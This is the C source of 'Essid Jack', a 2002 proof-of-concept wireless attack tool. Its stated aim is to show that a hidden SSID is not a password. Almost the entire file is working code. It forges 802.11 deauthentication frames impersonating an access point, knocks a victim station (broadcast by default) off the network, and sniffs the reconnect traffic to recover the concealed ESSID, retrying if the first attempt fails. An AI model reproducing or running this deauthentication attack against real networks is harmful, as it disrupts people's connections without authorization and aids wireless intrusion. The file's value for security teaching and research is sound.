
/******************************************************************************
**
** Essid Jack: Proof of concept so people will stop calling an ssid a password
**             and its much more eligant than *cough* brute forcing *cough*...
**
**   Author:  Abaddon, abaddon@802.11ninja.net
**
**   Other Development Stuff:  Xx25,  xx25@leper.org
**
**   Copyright (c) 2002 Abaddon, All Rights Reserved (see license info below). 
**
***************
**
**   Theory of Operation: (a little long winded, but no-one's making you read)
**
**          We abuse the lack of authentication of 802.11(b) management frames,
**          particularly the de-authentication management frames, to force the
**          extended service set identifier (ESSID) to be transmitted in the 
**          clear...works like so...Bob is connected to the access point
**          The people using this access point have been told that the essid 
**          is a password or shared secret and so naturaly they have opted to
**          have these essid's not transmitted in the clear (several AP's let
**          let you do this nowa days)...Problem is, when Bob connected to the
**          AP the first time he had to request to be on a network in the same
**          service set...it does this by declaring the service set it wants 
**          to be in, in the SSID element field of its probe request frame...
**          so all we have to do is witness him connect and he'll transmit 
**          that in the clear...
**       
**          now thats all fine and good, you've probably seen tools like 
**          Kismet find masked essid's from time to time and this is exactly
**          how they do it...the problem is, well, im a really lazy person and
**          i would be distracted by a newby shinny object long before this 
**          happened without some, well, incouragement...so what we're going 
**          to do is just incourage Bob to just get the hell off the network 
**          for a few miliseconds so we can see him reconnect...if all goes to
**          plan he shouldnt be off long enough to ever notice and you'll have
**          what you're looking for...
**
**          the way we "incourage" him to disconnect is by simply forging a 
**          deauthentication management frame, sent as his access point to 
**          Bob, and sense computers dont lie, Bobs computer will think he has
**          been deauthenticated (and thus disassociated), so it will follow 
**          the spec and send out probe requests to get back on...we see the 
**          probe requests, we display it for you, and you (hopefully) play 
**          nice (see legal info, disclaimer, and all that other stuff below)
**
**    Requirements:
**   
**          You're gonna need the AirJack driver package to get this to work
**          if you dont see aj0 when you type ifconfig -a, then its not gonna
**          work...these drivers only work on Linux, and then only on 2.4.x
**          kernels, and I have no plans to port this driver to any other 
**          platforms (sorry BSD guys, I just have no free time)...
**
**    Build Instructions:
**          
**          With the AirJack package: make essid_jack
**          Without the package     : gcc -O2 essid_jack.c -o essid_jack
**
********************
**
** Legal:
**
**   This program is free software; you can redistribute it and/or
**   modify it under the terms of the GNU General Public License
**   as published by the Free Software Foundation; either version 2
**   of the License, or (at your option) any later version.
**
**   This program is distributed in the hope that it will be useful,
**   but WITHOUT ANY WARRANTY; without even the implied warranty of
**   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
**   GNU General Public License for more details.
**
**   You should have received a copy of the GNU General Public License
**   along with this program; if not, write to the Free Software
**   Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
**
***************
**
** $Id$
**
******************************************************************************/
#define __ESSID_JACK_C__
#include <sys/types.h>
#include <asm/types.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <features.h>    /* for the glibc version number */
#include <netinet/in.h>
#if __GLIBC__ >= 2 && __GLIBC_MINOR >= 1
#include <netpacket/packet.h>
#include <net/ethernet.h>     /* the L2 protocols */
#else
#include <asm/types.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>   /* The L2 protocols */
#endif
#include <syslog.h>
#include <limits.h>
#include <ctype.h>

#include "80211.h"
#include "../airjack.h"


/*** Globals ***/

int		channel;		/* channel the bss is on */
char	ifname[IFNAMSIZ];		/* name of the interface to send this out on */
__u8	bssid[6];
__u8	dest[6];		
__u8	buf[4096];
int		sockfd;			/* listen and send socket */

/***************/


/*
 * a safe (portable) implimentation of signal()...
 */
static void safe_signal (int signum, void (*handler)(int))
{ 
    struct sigaction	sa;

    memset(&sa, 0, sizeof(struct sigaction));
    sa.sa_handler = handler;

#ifdef SA_RESTART
    sa.sa_flags |= SA_RESTART;
#endif
#ifdef SA_INTERRUPT
    sa.sa_flags &= ~ SA_INTERRUPT;
#endif
sigaction_again:
    if(sigaction(signum, &sa, NULL) < 0) {
        if(errno == EINTR) 
            goto sigaction_again;
        fprintf(stderr, "error while setting up timeout signal handler.\n");
        exit(1);
    }
}


/*
 * sets up the raw link layer socket for Aironet type cards...
 * returns a filedescriptor on success, -1 on error, errno is set
 */
static int get_socket (void)
{
    struct sockaddr_ll	addr;
    struct ifreq		req;
    struct aj_config	aj_conf;
    int					sockfd;


    /* open the link layer socket */
    if((sockfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        return(-1);
    }

    /* get the interface index */
    memset(&req, 0, sizeof(struct ifreq));
    memset(&aj_conf, 0, sizeof(struct aj_config));
    strcpy(req.ifr_name, ifname);

    if(ioctl(sockfd, SIOCGIFINDEX, &req) < 0) {
        return(-2);
    }

    /* bind the socket to the interface */
    memset(&addr, 0, sizeof(struct sockaddr_ll));
    addr.sll_ifindex = req.ifr_ifindex;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_family = AF_PACKET;
    if(bind(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_ll)) < 0) {
        return(-3);
    }

    if(channel != -1) {
        req.ifr_data = (char *)&aj_conf;

        /* populate the structure */
        if(ioctl(sockfd, SIOCAJGMODE, &req) < 0) {
            return(-4);
        }

        aj_conf.channel = channel;
        aj_conf.monitor = 1;

        if(ioctl(sockfd, SIOCAJSMODE, &req) < 0) {
            return(-4);
        }
    }

    return(sockfd);
}


/*
 * converts all lower case letters in the the string to upper case
 */
static __inline__ void to_upper (char *s)
{
    char	*p;
    char	offset;

    offset = 'A' - 'a';
    for(p=s;*p != '\0';p++) {
        if(islower(*p)) {
            *p += offset;
        }
    }
}


/*
 * converts a string to a mac address...
 * returns 1 on success, -1 on failure...
 * failure indicates poorly formed input...
 */
int string_to_mac (char *string, __u8 *mac_buf)
{
    char			*ptr, *next;
    unsigned long	val;
    int				i;


    to_upper(string);

    ptr = next = string;
    for(i=0;i < 6;i++) {
        if((val = strtoul(next, &ptr, 16)) > 255) {
            errno = EINVAL;
            return(-1);
        }
        mac_buf[i] = (__u8)val;
        if((next == ptr) && (i != 6 - 1)) {
            errno = EINVAL;
            return(-1);
        }
        next = ptr + 1;
    }

    return(1);
}


/*
 * um, its usage...
 */
static void usage (const char *pname)
{
    
    fprintf(stderr, "Essid Jack: Proof of concept so people will stop calling an ssid a password.\n\n");
    fprintf(stderr, "Usage: %s -b <bssid> [ -d <destination mac> ] [ -c <channel number> ] [ -i <interface name> ]\n", pname);
    fprintf(stderr, "       -b:  bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)\n");
    fprintf(stderr, "       -d:  destination mac address, defaults to broadcast address.\n");
    fprintf(stderr, "       -c:  channel number (1-14) that the access point is on, defaults to current.\n");
    fprintf(stderr, "       -i:  the name of the AirJack interface to use (defaults to aj0).\n\n");
    exit(1);
}


/*
 * parses the command line options...
 */
static void parse_opts (int argc, char **argv)
{
	char	opt;
	char	*pname = argv[0];
    __u8	opts_given = 0;		/* bitfield to make sure they enter the right stuff */


#define OPT_BSSID	4
	

	/* set defaults */
    strcpy(ifname, "aj0");
    memset(&(dest), 0xff, sizeof(dest));
    channel = -1;

	opterr = 0;
	while((opt = getopt(argc, argv, "i:d:b:c:")) > 0) {
		switch(opt) {
        case 'i':
            strncpy(ifname, optarg, IFNAMSIZ);
            break;
        case 'b':
            opts_given |= OPT_BSSID;
            if(string_to_mac(optarg, bssid) < 0) {
                fprintf(stderr, "Improperly formed BSSID.\n");
                exit(1);
            }
            break;
        case 'd':
            if(string_to_mac(optarg, dest) < 0) {
                fprintf(stderr, "Improperly formed destination address (victum).\n");
                exit(1);
            }
            break;
        case 'c':
            channel = atoi(optarg);
            if((channel > 14) || (channel < 1)) {
                usage(pname);
            }
            break;
        default:
            usage(pname);
            break;
		}
	}

    if(!(opts_given & OPT_BSSID)) {
        usage(pname);
    }
}


/*
 * sends a deauth to the given poor bastard, for the given bssid...
 */
void send_deauth (__u8 *bssid, __u8 *dest)
{
    struct {
        struct a3_80211 hdr;
        unsigned short int	reason;
    }__attribute__ ((packed)) frame;


    /* setup the frame */
    memset(&frame, 0, sizeof(frame));
    memcpy(frame.hdr.mh_mac1, dest, sizeof(frame.hdr.mh_mac1));
    memcpy(frame.hdr.mh_mac2, bssid, sizeof(frame.hdr.mh_mac2));
    memcpy(frame.hdr.mh_mac3, bssid, sizeof(frame.hdr.mh_mac3));
    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_DEAUTH;
    frame.hdr.mh_from_ds = 1;
    frame.reason = 2;	/* previous authentication is no longer valid */


    if(write(sockfd, &frame, sizeof(frame)) < 0) {
        perror("write");
        exit(1);
    }
}

struct element_id *next_element (struct element_id *prev, size_t len)
{

    if((((__u32)(prev) - (__u32)(buf)) + prev->e_length + sizeof(struct element_id)) <= len) {
        return((struct element_id *)((__u8 *)(prev+1) + prev->e_length));
    } else {
        return(NULL);
    }
}


/*
 * finds the essid in a probe responce...
 */
char *get_essid(struct a3_80211 *hdr, size_t len)
{
    struct element_id	*elem = (struct element_id *)((__u8 *)(hdr+1) + 12);
    static char			essid[33];	/* first byte length */
    static int			count = 0;	/* count to work around Linksys WAP-11 quirks */

    memset(essid, 0, sizeof(essid));
    if(len >= (sizeof(struct a3_80211) + sizeof(struct element_id) + elem->e_length)) {
        do { 
            if(elem->e_element_id == ELEM_SSID) {
                if(elem->e_length < 33) {
                    memcpy(essid + 1, (elem+1), elem->e_length);
                    essid[0] = elem->e_length;
                    /*
                     * my Linksys WAP-11 does this weird ass thing where it sends one with an 
                     * essid of "@" for some reason, so if the essid is "@", then we're gonna 
                     * wait for it to be "@" a second time before we go with it...
                     */
                    if((essid[0] == 1) && (essid[1] == '@') && (count == 0)) {
                        count++;
                        memset(essid, 0, sizeof(essid));
                    }
                    return(essid);
                }
            }
        } while((elem = next_element(elem, len)) != NULL);
    }
    return(essid);
}


/*
 * SIGALRM handler for timeout when waiting for the essid...
 */
void try_again (int signum)
{
    static	int	retry_count = 0;


    if(++retry_count < 3) {
        send_deauth(bssid, dest);
    } else {
        fprintf(stderr, "The bastards dont seem to be taking the bate, are you sure you're on the correct channel?\n");
        close(sockfd);
        exit(1);
    }
}


/*
 * this program forces a network to give up its essid...uh read above...
 */
int main (int argc, char **argv)
{
    struct a3_80211		*hdr = (struct a3_80211 *)buf;
    struct itimerval	itv;
    ssize_t				nbytes;
    char				*essid;
    int					i;


    parse_opts(argc, argv);

    if((sockfd = get_socket()) < 0) {
        perror("get_socket");
        exit(1);
    }

    /* set our timeout */
    safe_signal(SIGALRM, try_again);

    itv.it_interval.tv_sec = 1;
    itv.it_interval.tv_usec = 0;
    itv.it_value.tv_sec = 1;
    itv.it_value.tv_usec = 0;

    setitimer(ITIMER_REAL, &itv, NULL);

    send_deauth(bssid, dest);
    send_deauth(bssid, dest);

    /* listen for the frame */
    do {
        memset(buf, 0, sizeof(buf));
        if((nbytes = read(sockfd, buf, sizeof(buf))) < 0) {
            perror("read");
            exit(1);
        }
    } while(!(((hdr->mh_type == FC_TYPE_MGT) && (hdr->mh_subtype == MGT_PB_RS)) &&
            !memcmp(hdr->mh_mac3, bssid, sizeof(bssid)) && 
            ((essid = get_essid(hdr, nbytes)), (essid[0] != 0))));

    /*
     * ok if we're here, we should have a good essid, so lets print it out... 
     * it is however possible for an essid to have wack chars in it, so we're
     * going to escape any wack chars we find...
     */
    printf("Got it, the essid is (escape characters are c style):\n\"");
    for(i=1;i <= essid[0];i++) {
        if(isprint(essid[i])) {
            if(essid[i] != '\\') {
                printf("%c", essid[i]);
            } else {
                printf("\\\\");
            }
        } else {
            printf("\\x%2hhx", essid[i]);
        }

    }
    printf("\"\n");

    close(sockfd);
    exit(0);
}

